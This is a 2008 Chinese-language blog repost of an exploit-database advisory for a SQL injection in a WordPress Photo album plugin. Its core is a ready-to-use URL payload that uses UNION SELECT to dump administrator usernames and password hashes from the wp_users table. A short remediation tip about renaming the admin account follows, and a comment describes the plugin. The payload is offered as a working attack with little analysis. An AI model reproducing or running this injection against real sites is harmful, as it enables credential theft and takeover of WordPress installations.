Wordpress Photo album Remote SQL Injection Vulnerability

Home > wordpress支持, 漏洞 > Wordpress Photo album Remote SQL Injection Vulnerability

Wordpress Photo album Remote SQL Injection Vulnerability

February 18th, 2008

EXAMPLE
http://xxxxxxxx/?page_id=13&album= [exploit]
EXPLOİT
S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
# WordPress album PHOTO SQL Injection# AUTHOR : S@BUN## HOME 1 : http://www.milw0rm.com/author/1334#
建议修改admin用户权限并建立一个不用于发文章的管理员用户或者直接进数据库修改admin为其他名字

admin, Photo, Remote SQL Injection, WordPress, 权限, 注入, 漏洞

转载原创文章请注明，转载自：Lin's Space|Only[http://clin003.com]

本文链接: http://clin003.com/exploits/wordpress-photo-album-remote-sql-injection-vulnerability-451/

Google比较注重原创性和时效性，若没有找到需要的内容可尝试以下搜素。

Comments (1) Trackbacks (0) Leave a comment Trackback

wiki

February 18th, 2008 at 23:56 | #1

Reply | Quote

This plugin is designed to easily manage and display yourphoto albums within yourWordPress site.Plugin Admin FeaturesYou can find the plugin admin section under Manage then submenu Photos.Manage and create albumsMove photos to and from albumsUpload and delete photos

No trackbacks yet.

搜狐营销广告服务跨站漏洞[doc.go.sohu.com*url=] 用telnet检测网址返回的头部信息状态码

Lin's Space|Only

Wordpress Photo album Remote SQL Injection Vulnerability

公告

在谷歌工具栏上订阅 | 分享精彩

新鲜标题

Pages

新鲜评论